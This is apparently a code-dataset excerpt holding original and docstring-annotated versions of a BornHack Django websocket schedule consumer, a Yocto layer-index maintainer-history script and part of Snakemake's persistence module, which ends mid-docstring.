await self._session.close()
| pt | 0.153259 | 2.319211 | 2 |
src/program/consumers.py | pwelzel/bornhack-website | 0 | 13539 | <filename>src/program/consumers.py<gh_stars>0
from channels.generic.websocket import JsonWebsocketConsumer
from camps.models import Camp
from .models import (
Event,
EventInstance,
Favorite,
EventLocation,
EventType,
EventTrack,
Speaker
)
class ScheduleConsumer(JsonWebsocketConsumer):
    """Websocket consumer serving schedule data and favorite toggles."""

    groups = ['schedule_users']

    def receive(self, text_data, **kwargs):
        """Dispatch an incoming JSON message on its 'action' field.

        Replies (via send_json) only for 'init'; 'favorite'/'unfavorite'
        are fire-and-forget.
        """
        user = self.scope['user']
        content = self.decode_json(text_data)
        action = content.get('action')
        data = {}

        if action == 'init':
            camp_slug = content.get('camp_slug')
            try:
                camp = Camp.objects.get(slug=camp_slug)
            except Camp.DoesNotExist:
                # Unknown camp: reply with nothing, as before.
                camp = None
            if camp is not None:
                data = self._build_init_payload(camp, user)
        elif action == 'favorite':
            event_instance_id = content.get('event_instance_id')
            event_instance = EventInstance.objects.get(id=event_instance_id)
            Favorite.objects.create(
                user=user,
                event_instance=event_instance
            )
        elif action == 'unfavorite':
            try:
                event_instance_id = content.get('event_instance_id')
                event_instance = EventInstance.objects.get(
                    id=event_instance_id
                )
                favorite = Favorite.objects.get(
                    event_instance=event_instance,
                    user=user
                )
                favorite.delete()
            except Favorite.DoesNotExist:
                # Nothing to unfavorite; we don't want to do anything.
                return

        if data:
            self.send_json(data)

    def _build_init_payload(self, camp, user):
        """Serialize everything the schedule frontend needs for *camp*."""
        days = [
            {
                'repr': day.lower.strftime('%A %Y-%m-%d'),
                'iso': day.lower.strftime('%Y-%m-%d'),
                'day_name': day.lower.strftime('%A'),
            }
            for day in camp.get_days('camp')
        ]
        events = [
            x.serialize() for x in Event.objects.filter(track__camp=camp)
        ]
        # Event instances carry per-user favorite state.
        event_instances = [
            x.serialize(user=user)
            for x in EventInstance.objects.filter(event__track__camp=camp)
        ]
        event_locations = [
            x.serialize() for x in EventLocation.objects.filter(camp=camp)
        ]
        event_types = [
            x.serialize() for x in EventType.objects.filter()
        ]
        event_tracks = [
            x.serialize() for x in EventTrack.objects.filter(camp=camp)
        ]
        speakers = [
            x.serialize() for x in Speaker.objects.filter(camp=camp)
        ]
        return {
            "action": "init",
            "events": events,
            "event_instances": event_instances,
            "event_locations": event_locations,
            "event_types": event_types,
            "event_tracks": event_tracks,
            "speakers": speakers,
            "days": days,
        }

    def disconnect(self, message, **kwargs):
        """No per-connection cleanup required."""
        pass
| <filename>src/program/consumers.py<gh_stars>0
from channels.generic.websocket import JsonWebsocketConsumer
from camps.models import Camp
from .models import (
Event,
EventInstance,
Favorite,
EventLocation,
EventType,
EventTrack,
Speaker
)
class ScheduleConsumer(JsonWebsocketConsumer):
groups = ['schedule_users']
def receive(self, text_data, **kwargs):
user = self.scope['user']
content = self.decode_json(text_data)
action = content.get('action')
data = {}
if action == 'init':
camp_slug = content.get('camp_slug')
try:
camp = Camp.objects.get(slug=camp_slug)
days = list(map(
lambda day:
{
'repr': day.lower.strftime('%A %Y-%m-%d'),
'iso': day.lower.strftime('%Y-%m-%d'),
'day_name': day.lower.strftime('%A'),
},
camp.get_days('camp')
))
events_query_set = Event.objects.filter(track__camp=camp)
events = list([x.serialize() for x in events_query_set])
event_instances_query_set = EventInstance.objects.filter(
event__track__camp=camp
)
event_instances = list([
x.serialize(user=user)
for x in event_instances_query_set
])
event_locations_query_set = EventLocation.objects.filter(
camp=camp
)
event_locations = list([
x.serialize()
for x in event_locations_query_set
])
event_types_query_set = EventType.objects.filter()
event_types = list([
x.serialize()
for x in event_types_query_set
])
event_tracks_query_set = EventTrack.objects.filter(
camp=camp
)
event_tracks = list([
x.serialize()
for x in event_tracks_query_set
])
speakers_query_set = Speaker.objects.filter(camp=camp)
speakers = list([x.serialize() for x in speakers_query_set])
data = {
"action": "init",
"events": events,
"event_instances": event_instances,
"event_locations": event_locations,
"event_types": event_types,
"event_tracks": event_tracks,
"speakers": speakers,
"days": days,
}
except Camp.DoesNotExist:
pass
if action == 'favorite':
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(id=event_instance_id)
Favorite.objects.create(
user=user,
event_instance=event_instance
)
if action == 'unfavorite':
try:
event_instance_id = content.get('event_instance_id')
event_instance = EventInstance.objects.get(
id=event_instance_id
)
favorite = Favorite.objects.get(
event_instance=event_instance,
user=user
)
favorite.delete()
except Favorite.DoesNotExist:
# We don't want to do anything.
return
if data:
self.send_json(data)
def disconnect(self, message, **kwargs):
pass
| es | 0.244204 | 2.154123 | 2 |
rrs/tools/rrs_maintainer_history.py | WindRiver-OpenSourceLabs/layerindex-web | 0 | 13540 | #!/usr/bin/env python3
# Standalone script which rebuilds the history of maintainership
#
# Copyright (C) 2015 Intel Corporation
# Author: <NAME> <<EMAIL>>
#
# Licensed under the MIT license, see COPYING.MIT for details
import sys
import os.path
import optparse
import logging
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__))))
from common import common_setup, get_logger, DryRunRollbackException
common_setup()
from layerindex import utils, recipeparse
utils.setup_django()
from django.db import transaction
import settings
from layerindex.models import Recipe, LayerBranch, LayerItem
from rrs.models import MaintenancePlan, Maintainer, RecipeMaintainerHistory, RecipeMaintainer, RecipeMaintenanceLink
from django.core.exceptions import ObjectDoesNotExist
# FIXME we shouldn't be hardcoded to expect RECIPE_MAINTAINER to be set in this file,
# as it may be in the recipe in future
MAINTAINERS_INCLUDE_PATH = 'conf/distro/include/maintainers.inc'
"""
Try to get recipe maintainer from line, if not found return None
"""
def get_recipe_maintainer(line, logger):
import re
regex = re.compile('^RECIPE_MAINTAINER_pn-(?P<pn>.*)\s=\s"(?P<name>.+) <(?P<email>.*)>"$')
match = regex.search(line)
if match:
return (match.group('pn'), match.group('name'), match.group('email'))
else:
logger.debug("line (%s) don\'t match" % (line))
return None
"""
Get commit information from text.
Returns author_name, author_email, date and title.
"""
def get_commit_info(info, logger):
import re
from datetime import datetime
from email.utils import parsedate_tz, mktime_tz
author_regex = re.compile("^Author: (?P<name>.*) <(?P<email>.*)>$")
date_regex = re.compile("^Date: (?P<date>.*)$")
title_regex = re.compile("^ (?P<title>.*)$")
lines = info.split('\n')
author_name = author_regex.search(lines[1]).group('name')
author_email = author_regex.search(lines[1]).group('email')
date_str = date_regex.search(lines[2]).group('date')
date = datetime.utcfromtimestamp(mktime_tz(parsedate_tz(date_str)))
title = title_regex.search(lines[4]).group('title')
return (author_name, author_email, date, title)
def maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir):
maintainers_full_path = os.path.join(layerdir, MAINTAINERS_INCLUDE_PATH)
if not os.path.exists(maintainers_full_path):
logger.warning('Maintainer style is maintainers.inc for plan %s but no maintainers.inc exists in for %s' % (maintplan, layerbranch))
return
logger.debug('Checking maintainers.inc history for %s' % layerbranch)
commits = utils.runcmd("git log --format='%%H' --reverse --date=rfc origin/master %s"
% os.path.join(layerbranch.vcs_subdir, MAINTAINERS_INCLUDE_PATH),
repodir, logger=logger)
no_maintainer, _ = Maintainer.objects.get_or_create(name='No maintainer')
try:
with transaction.atomic():
for commit in commits.strip().split("\n"):
if RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch, sha1=commit):
continue
logger.debug("Analysing commit %s ..." % (commit))
(author_name, author_email, date, title) = \
get_commit_info(utils.runcmd("git show " + commit, repodir,
logger=logger), logger)
author = Maintainer.create_or_update(author_name, author_email)
rms = RecipeMaintainerHistory(title=title, date=date, author=author,
sha1=commit, layerbranch=layerbranch)
rms.save()
utils.runcmd("git checkout %s -f" % commit,
repodir, logger=logger)
lines = [line.strip() for line in open(maintainers_full_path)]
for line in lines:
res = get_recipe_maintainer(line, logger)
if res:
(pn, name, email) = res
qry = Recipe.objects.filter(pn = pn, layerbranch = layerbranch)
if qry:
m = Maintainer.create_or_update(name, email)
rm = RecipeMaintainer()
rm.recipe = qry[0]
rm.maintainer = m
rm.history = rms
rm.save()
logger.debug("%s: Change maintainer to %s in commit %s." % \
(pn, m.name, commit))
else:
logger.debug("%s: Not found in %s." % \
(pn, layerbranch))
# set missing recipes to no maintainer
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: Not found maintainer in commit %s set to 'No maintainer'." % \
(recipe.pn, rms.sha1))
# set new recipes to no maintainer if don't have one
rms = RecipeMaintainerHistory.get_last(layerbranch)
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: New recipe linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: New recipe not found maintainer set to 'No maintainer'." % \
(recipe.pn))
if options.dry_run:
raise DryRunRollbackException
except DryRunRollbackException:
pass
"""
Recreate Maintainership history from the beginning
"""
def maintainer_history(options, logger):
fetchdir = settings.LAYER_FETCH_DIR
if options.plan:
maintplans = MaintenancePlan.objects.filter(id=int(options.plan))
if not maintplans.exists():
logger.error('No maintenance plan with ID %s found' % options.plan)
sys.exit(1)
else:
maintplans = MaintenancePlan.objects.filter(updates_enabled=True)
if not maintplans.exists():
logger.error('No enabled maintenance plans found')
sys.exit(1)
lockfn = os.path.join(fetchdir, "layerindex.lock")
lockfile = utils.lock_file(lockfn)
if not lockfile:
logger.error("Layer index lock timeout expired")
sys.exit(1)
try:
for maintplan in maintplans:
for item in maintplan.maintenanceplanlayerbranch_set.all():
layerbranch = item.layerbranch
if options.fullreload and not options.dry_run:
RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch).delete()
urldir = str(layerbranch.layer.get_fetch_dir())
repodir = os.path.join(fetchdir, urldir)
layerdir = os.path.join(repodir, layerbranch.vcs_subdir)
if maintplan.maintainer_style == 'I':
# maintainers.inc
maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir)
elif maintplan.maintainer_style == 'L':
# Layer-wide, don't need to do anything
logger.debug('Skipping maintainer processing for %s - plan %s maintainer style is layer-wide' % (layerbranch, maintplan))
else:
raise Exception('Unknown maintainer style %s for maintenance plan %s' % (maintplan.maintainer_style, maintplan))
finally:
utils.unlock_file(lockfile)
if __name__=="__main__":
parser = optparse.OptionParser(usage = """%prog [options]""")
parser.add_option("-p", "--plan",
help="Specify maintenance plan to operate on (default is all plans that have updates enabled)",
action="store", dest="plan", default=None)
parser.add_option("--fullreload",
help="Reload upgrade data from scratch",
action="store_true", dest="fullreload", default=False)
parser.add_option("-d", "--debug",
help = "Enable debug output",
action="store_const", const=logging.DEBUG, dest="loglevel",
default=logging.INFO)
parser.add_option("--dry-run",
help = "Do not write any data back to the database",
action="store_true", dest="dry_run", default=False)
logger = get_logger("MaintainerUpdate", settings)
options, args = parser.parse_args(sys.argv)
logger.setLevel(options.loglevel)
maintainer_history(options, logger)
| #!/usr/bin/env python3
# Standalone script which rebuilds the history of maintainership
#
# Copyright (C) 2015 Intel Corporation
# Author: <NAME> <<EMAIL>>
#
# Licensed under the MIT license, see COPYING.MIT for details
import sys
import os.path
import optparse
import logging
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__))))
from common import common_setup, get_logger, DryRunRollbackException
common_setup()
from layerindex import utils, recipeparse
utils.setup_django()
from django.db import transaction
import settings
from layerindex.models import Recipe, LayerBranch, LayerItem
from rrs.models import MaintenancePlan, Maintainer, RecipeMaintainerHistory, RecipeMaintainer, RecipeMaintenanceLink
from django.core.exceptions import ObjectDoesNotExist
# FIXME we shouldn't be hardcoded to expect RECIPE_MAINTAINER to be set in this file,
# as it may be in the recipe in future
MAINTAINERS_INCLUDE_PATH = 'conf/distro/include/maintainers.inc'
"""
Try to get recipe maintainer from line, if not found return None
"""
def get_recipe_maintainer(line, logger):
import re
regex = re.compile('^RECIPE_MAINTAINER_pn-(?P<pn>.*)\s=\s"(?P<name>.+) <(?P<email>.*)>"$')
match = regex.search(line)
if match:
return (match.group('pn'), match.group('name'), match.group('email'))
else:
logger.debug("line (%s) don\'t match" % (line))
return None
"""
Get commit information from text.
Returns author_name, author_email, date and title.
"""
def get_commit_info(info, logger):
import re
from datetime import datetime
from email.utils import parsedate_tz, mktime_tz
author_regex = re.compile("^Author: (?P<name>.*) <(?P<email>.*)>$")
date_regex = re.compile("^Date: (?P<date>.*)$")
title_regex = re.compile("^ (?P<title>.*)$")
lines = info.split('\n')
author_name = author_regex.search(lines[1]).group('name')
author_email = author_regex.search(lines[1]).group('email')
date_str = date_regex.search(lines[2]).group('date')
date = datetime.utcfromtimestamp(mktime_tz(parsedate_tz(date_str)))
title = title_regex.search(lines[4]).group('title')
return (author_name, author_email, date, title)
def maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir):
maintainers_full_path = os.path.join(layerdir, MAINTAINERS_INCLUDE_PATH)
if not os.path.exists(maintainers_full_path):
logger.warning('Maintainer style is maintainers.inc for plan %s but no maintainers.inc exists in for %s' % (maintplan, layerbranch))
return
logger.debug('Checking maintainers.inc history for %s' % layerbranch)
commits = utils.runcmd("git log --format='%%H' --reverse --date=rfc origin/master %s"
% os.path.join(layerbranch.vcs_subdir, MAINTAINERS_INCLUDE_PATH),
repodir, logger=logger)
no_maintainer, _ = Maintainer.objects.get_or_create(name='No maintainer')
try:
with transaction.atomic():
for commit in commits.strip().split("\n"):
if RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch, sha1=commit):
continue
logger.debug("Analysing commit %s ..." % (commit))
(author_name, author_email, date, title) = \
get_commit_info(utils.runcmd("git show " + commit, repodir,
logger=logger), logger)
author = Maintainer.create_or_update(author_name, author_email)
rms = RecipeMaintainerHistory(title=title, date=date, author=author,
sha1=commit, layerbranch=layerbranch)
rms.save()
utils.runcmd("git checkout %s -f" % commit,
repodir, logger=logger)
lines = [line.strip() for line in open(maintainers_full_path)]
for line in lines:
res = get_recipe_maintainer(line, logger)
if res:
(pn, name, email) = res
qry = Recipe.objects.filter(pn = pn, layerbranch = layerbranch)
if qry:
m = Maintainer.create_or_update(name, email)
rm = RecipeMaintainer()
rm.recipe = qry[0]
rm.maintainer = m
rm.history = rms
rm.save()
logger.debug("%s: Change maintainer to %s in commit %s." % \
(pn, m.name, commit))
else:
logger.debug("%s: Not found in %s." % \
(pn, layerbranch))
# set missing recipes to no maintainer
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: Not found maintainer in commit %s set to 'No maintainer'." % \
(recipe.pn, rms.sha1))
# set new recipes to no maintainer if don't have one
rms = RecipeMaintainerHistory.get_last(layerbranch)
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: New recipe linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: New recipe not found maintainer set to 'No maintainer'." % \
(recipe.pn))
if options.dry_run:
raise DryRunRollbackException
except DryRunRollbackException:
pass
"""
Recreate Maintainership history from the beginning
"""
def maintainer_history(options, logger):
fetchdir = settings.LAYER_FETCH_DIR
if options.plan:
maintplans = MaintenancePlan.objects.filter(id=int(options.plan))
if not maintplans.exists():
logger.error('No maintenance plan with ID %s found' % options.plan)
sys.exit(1)
else:
maintplans = MaintenancePlan.objects.filter(updates_enabled=True)
if not maintplans.exists():
logger.error('No enabled maintenance plans found')
sys.exit(1)
lockfn = os.path.join(fetchdir, "layerindex.lock")
lockfile = utils.lock_file(lockfn)
if not lockfile:
logger.error("Layer index lock timeout expired")
sys.exit(1)
try:
for maintplan in maintplans:
for item in maintplan.maintenanceplanlayerbranch_set.all():
layerbranch = item.layerbranch
if options.fullreload and not options.dry_run:
RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch).delete()
urldir = str(layerbranch.layer.get_fetch_dir())
repodir = os.path.join(fetchdir, urldir)
layerdir = os.path.join(repodir, layerbranch.vcs_subdir)
if maintplan.maintainer_style == 'I':
# maintainers.inc
maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir)
elif maintplan.maintainer_style == 'L':
# Layer-wide, don't need to do anything
logger.debug('Skipping maintainer processing for %s - plan %s maintainer style is layer-wide' % (layerbranch, maintplan))
else:
raise Exception('Unknown maintainer style %s for maintenance plan %s' % (maintplan.maintainer_style, maintplan))
finally:
utils.unlock_file(lockfile)
if __name__=="__main__":
parser = optparse.OptionParser(usage = """%prog [options]""")
parser.add_option("-p", "--plan",
help="Specify maintenance plan to operate on (default is all plans that have updates enabled)",
action="store", dest="plan", default=None)
parser.add_option("--fullreload",
help="Reload upgrade data from scratch",
action="store_true", dest="fullreload", default=False)
parser.add_option("-d", "--debug",
help = "Enable debug output",
action="store_const", const=logging.DEBUG, dest="loglevel",
default=logging.INFO)
parser.add_option("--dry-run",
help = "Do not write any data back to the database",
action="store_true", dest="dry_run", default=False)
logger = get_logger("MaintainerUpdate", settings)
options, args = parser.parse_args(sys.argv)
logger.setLevel(options.loglevel)
maintainer_history(options, logger)
| pt | 0.173314 | 1.919856 | 2 |
snakemake/persistence.py | scholer/snakemake | 0 | 13541 | __author__ = "<NAME>"
__copyright__ = "Copyright 2015-2019, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import os
import shutil
import signal
import marshal
import pickle
import json
import time
from base64 import urlsafe_b64encode, b64encode
from functools import lru_cache, partial
from itertools import filterfalse, count
from pathlib import Path
from snakemake.logging import logger
from snakemake.jobs import jobfiles
from snakemake.utils import listfiles
class Persistence:
def __init__(
self,
nolock=False,
dag=None,
conda_prefix=None,
singularity_prefix=None,
shadow_prefix=None,
warn_only=False,
):
self.path = os.path.abspath(".snakemake")
if not os.path.exists(self.path):
os.mkdir(self.path)
self._lockdir = os.path.join(self.path, "locks")
if not os.path.exists(self._lockdir):
os.mkdir(self._lockdir)
self.dag = dag
self._lockfile = dict()
self._metadata_path = os.path.join(self.path, "metadata")
self._incomplete_path = os.path.join(self.path, "incomplete")
self.conda_env_archive_path = os.path.join(self.path, "conda-archive")
self.benchmark_path = os.path.join(self.path, "benchmarks")
if conda_prefix is None:
self.conda_env_path = os.path.join(self.path, "conda")
else:
self.conda_env_path = os.path.abspath(os.path.expanduser(conda_prefix))
if singularity_prefix is None:
self.container_img_path = os.path.join(self.path, "singularity")
else:
self.container_img_path = os.path.abspath(
os.path.expanduser(singularity_prefix)
)
if shadow_prefix is None:
self.shadow_path = os.path.join(self.path, "shadow")
else:
self.shadow_path = os.path.join(shadow_prefix, "shadow")
# place to store any auxiliary information needed during a run (e.g. source tarballs)
self.aux_path = os.path.join(self.path, "auxiliary")
# migration of .snakemake folder structure
migration_indicator = Path(
os.path.join(self._incomplete_path, "migration_underway")
)
if (
os.path.exists(self._metadata_path)
and not os.path.exists(self._incomplete_path)
) or migration_indicator.exists():
os.makedirs(self._incomplete_path, exist_ok=True)
migration_indicator.touch()
self.migrate_v1_to_v2()
migration_indicator.unlink()
self._incomplete_cache = None
for d in (
self._metadata_path,
self._incomplete_path,
self.shadow_path,
self.conda_env_archive_path,
self.conda_env_path,
self.container_img_path,
self.aux_path,
):
os.makedirs(d, exist_ok=True)
if nolock:
self.lock = self.noop
self.unlock = self.noop
if warn_only:
self.lock = self.lock_warn_only
self.unlock = self.noop
self._read_record = self._read_record_cached
def migrate_v1_to_v2(self):
logger.info("Migrating .snakemake folder to new format...")
i = 0
for path, _, filenames in os.walk(self._metadata_path):
path = Path(path)
for filename in filenames:
with open(path / filename, "r") as f:
try:
record = json.load(f)
except json.JSONDecodeError:
continue # not a properly formatted JSON file
if record.get("incomplete", False):
target_path = Path(self._incomplete_path) / path.relative_to(
self._metadata_path
)
os.makedirs(target_path, exist_ok=True)
shutil.copyfile(
path / filename,
target_path / filename,
)
i += 1
# this can take a while for large folders...
if (i % 10000) == 0 and i > 0:
logger.info("{} files migrated".format(i))
logger.info("Migration complete")
@property
def files(self):
if self._files is None:
self._files = set(self.dag.output_files)
return self._files
@property
def locked(self):
inputfiles = set(self.all_inputfiles())
outputfiles = set(self.all_outputfiles())
if os.path.exists(self._lockdir):
for lockfile in self._locks("input"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles:
return True
for lockfile in self._locks("output"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles or f in inputfiles:
return True
return False
def lock_warn_only(self):
if self.locked:
logger.info(
"Error: Directory cannot be locked. This usually "
"means that another Snakemake instance is running on this directory. "
"Another possibility is that a previous run exited unexpectedly."
)
def lock(self):
if self.locked:
raise IOError("Another snakemake process " "has locked this directory.")
self._lock(self.all_inputfiles(), "input")
self._lock(self.all_outputfiles(), "output")
def unlock(self, *args):
logger.debug("unlocking")
for lockfile in self._lockfile.values():
try:
logger.debug("removing lock")
os.remove(lockfile)
except OSError as e:
if e.errno != 2: # missing file
raise e
logger.debug("removed all locks")
def cleanup_locks(self):
shutil.rmtree(self._lockdir)
def cleanup_metadata(self, path):
self._delete_record(self._metadata_path, path)
def cleanup_shadow(self):
if os.path.exists(self.shadow_path):
shutil.rmtree(self.shadow_path)
os.mkdir(self.shadow_path)
def conda_cleanup_envs(self):
# cleanup envs
in_use = set(env.hash[:8] for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_path):
if len(d) >= 8 and d[:8] not in in_use:
if os.path.isdir(os.path.join(self.conda_env_path, d)):
shutil.rmtree(os.path.join(self.conda_env_path, d))
else:
os.remove(os.path.join(self.conda_env_path, d))
# cleanup env archives
in_use = set(env.content_hash for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_archive_path):
if d not in in_use:
shutil.rmtree(os.path.join(self.conda_env_archive_path, d))
def started(self, job, external_jobid=None):
for f in job.output:
self._record(
self._incomplete_path,
{"external_jobid": external_jobid},
f,
)
def finished(self, job, keep_metadata=True):
if not keep_metadata:
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
return
version = str(job.rule.version) if job.rule.version is not None else None
code = self._code(job.rule)
input = self._input(job)
log = self._log(job)
params = self._params(job)
shellcmd = job.shellcmd
conda_env = self._conda_env(job)
fallback_time = time.time()
for f in job.expanded_output:
rec_path = self._record_path(self._incomplete_path, f)
starttime = os.path.getmtime(rec_path) if os.path.exists(rec_path) else None
# Sometimes finished is called twice, if so, lookup the previous starttime
if not os.path.exists(rec_path):
starttime = self._read_record(self._metadata_path, f).get(
"starttime", None
)
endtime = f.mtime.local_or_remote() if f.exists else fallback_time
self._record(
self._metadata_path,
{
"version": version,
"code": code,
"rule": job.rule.name,
"input": input,
"log": log,
"params": params,
"shellcmd": shellcmd,
"incomplete": False,
"starttime": starttime,
"endtime": endtime,
"job_hash": hash(job),
"conda_env": conda_env,
"container_img_url": job.container_img_url,
},
f,
)
self._delete_record(self._incomplete_path, f)
def cleanup(self, job):
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
self._delete_record(self._metadata_path, f)
def incomplete(self, job):
if self._incomplete_cache is None:
self._cache_incomplete_folder()
if self._incomplete_cache is False: # cache deactivated
def marked_incomplete(f):
return self._exists_record(self._incomplete_path, f)
else:
def marked_incomplete(f):
rec_path = self._record_path(self._incomplete_path, f)
return rec_path in self._incomplete_cache
return any(map(lambda f: f.exists and marked_incomplete(f), job.output))
def _cache_incomplete_folder(self):
self._incomplete_cache = {
os.path.join(path, f)
for path, dirnames, filenames in os.walk(self._incomplete_path)
for f in filenames
}
def external_jobids(self, job):
return list(
set(
self._read_record(self._incomplete_path, f).get("external_jobid", None)
for f in job.output
)
)
def metadata(self, path):
return self._read_record(self._metadata_path, path)
def version(self, path):
return self.metadata(path).get("version")
def rule(self, path):
return self.metadata(path).get("rule")
def input(self, path):
return self.metadata(path).get("input")
def log(self, path):
return self.metadata(path).get("log")
def shellcmd(self, path):
return self.metadata(path).get("shellcmd")
def params(self, path):
return self.metadata(path).get("params")
def code(self, path):
return self.metadata(path).get("code")
def version_changed(self, job, file=None):
"""Yields output files with changed versions of bool if file given."""
return _bool_or_gen(self._version_changed, job, file=file)
def code_changed(self, job, file=None):
"""Yields output files with changed code of bool if file given."""
return _bool_or_gen(self._code_changed, job, file=file)
def input_changed(self, job, file=None):
"""Yields output files with changed input of bool if file given."""
return _bool_or_gen(self._input_changed, job, file=file)
def params_changed(self, job, file=None):
"""Yields output files with changed params of bool if file given."""
return _bool_or_gen(self._params_changed, job, file=file)
def _version_changed(self, job, file=None):
assert file is not None
return self.version(file) != job.rule.version
def _code_changed(self, job, file=None):
assert file is not None
return self.code(file) != self._code(job.rule)
def _input_changed(self, job, file=None):
assert file is not None
return self.input(file) != self._input(job)
def _params_changed(self, job, file=None):
assert file is not None
return self.params(file) != self._params(job)
def noop(self, *args):
pass
def _b64id(self, s):
return urlsafe_b64encode(str(s).encode()).decode()
@lru_cache()
def _code(self, rule):
code = rule.run_func.__code__
return b64encode(pickle_code(code)).decode()
@lru_cache()
def _conda_env(self, job):
if job.conda_env:
return b64encode(job.conda_env.content).decode()
@lru_cache()
def _input(self, job):
return sorted(job.input)
@lru_cache()
def _log(self, job):
return sorted(job.log)
@lru_cache()
def _params(self, job):
return sorted(map(repr, job.params))
@lru_cache()
def _output(self, job):
return sorted(job.output)
def _record(self, subject, json_value, id):
recpath = self._record_path(subject, id)
os.makedirs(os.path.dirname(recpath), exist_ok=True)
with open(recpath, "w") as f:
json.dump(json_value, f)
def _delete_record(self, subject, id):
try:
recpath = self._record_path(subject, id)
os.remove(recpath)
recdirs = os.path.relpath(os.path.dirname(recpath), start=subject)
if recdirs != ".":
os.removedirs(recdirs)
except OSError as e:
if e.errno != 2: # not missing
raise e
@lru_cache()
def _read_record_cached(self, subject, id):
return self._read_record_uncached(subject, id)
def _read_record_uncached(self, subject, id):
if not self._exists_record(subject, id):
return dict()
with open(self._record_path(subject, id), "r") as f:
return json.load(f)
def _exists_record(self, subject, id):
return os.path.exists(self._record_path(subject, id))
def _locks(self, type):
return (
f
for f, _ in listfiles(
os.path.join(self._lockdir, "{{n,[0-9]+}}.{}.lock".format(type))
)
if not os.path.isdir(f)
)
def _lock(self, files, type):
for i in count(0):
lockfile = os.path.join(self._lockdir, "{}.{}.lock".format(i, type))
if not os.path.exists(lockfile):
self._lockfile[type] = lockfile
with open(lockfile, "w") as lock:
print(*files, sep="\n", file=lock)
return
def _record_path(self, subject, id):
max_len = (
os.pathconf(subject, "PC_NAME_MAX") if os.name == "posix" else 255
) # maximum NTFS and FAT32 filename length
if max_len == 0:
max_len = 255
b64id = self._b64id(id)
# split into chunks of proper length
b64id = [b64id[i : i + max_len - 1] for i in range(0, len(b64id), max_len - 1)]
# prepend dirs with @ (does not occur in b64) to avoid conflict with b64-named files in the same dir
b64id = ["@" + s for s in b64id[:-1]] + [b64id[-1]]
path = os.path.join(subject, *b64id)
return path
def all_outputfiles(self):
# we only look at output files that will be updated
return jobfiles(self.dag.needrun_jobs, "output")
def all_inputfiles(self):
# we consider all input files, also of not running jobs
return jobfiles(self.dag.jobs, "input")
def deactivate_cache(self):
self._read_record_cached.cache_clear()
self._read_record = self._read_record_uncached
self._incomplete_cache = False
def _bool_or_gen(func, job, file=None):
if file is None:
return (f for f in job.expanded_output if func(job, file=f))
else:
return func(job, file=file)
def pickle_code(code):
consts = [
(pickle_code(const) if type(const) == type(code) else const)
for const in code.co_consts
]
return pickle.dumps((code.co_code, code.co_varnames, consts, code.co_names))
| __author__ = "<NAME>"
__copyright__ = "Copyright 2015-2019, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import os
import shutil
import signal
import marshal
import pickle
import json
import time
from base64 import urlsafe_b64encode, b64encode
from functools import lru_cache, partial
from itertools import filterfalse, count
from pathlib import Path
from snakemake.logging import logger
from snakemake.jobs import jobfiles
from snakemake.utils import listfiles
class Persistence:
    def __init__(
        self,
        nolock=False,
        dag=None,
        conda_prefix=None,
        singularity_prefix=None,
        shadow_prefix=None,
        warn_only=False,
    ):
        """Initialize the on-disk persistence layer rooted at ``./.snakemake``.

        Creates the directory layout used for locks, per-output metadata,
        incomplete-job markers, conda env archives, conda/singularity
        environments, shadow directories and auxiliary run data, and migrates
        metadata from the v1 folder layout if necessary.

        Args:
            nolock: if True, replace lock()/unlock() with no-ops.
            dag: the workflow DAG; used to enumerate input/output files.
            conda_prefix: custom location for conda environments
                (defaults to ``.snakemake/conda``).
            singularity_prefix: custom location for singularity images
                (defaults to ``.snakemake/singularity``).
            shadow_prefix: custom parent directory for the shadow directory
                (defaults to ``.snakemake``).
            warn_only: if True, lock() only logs instead of raising when the
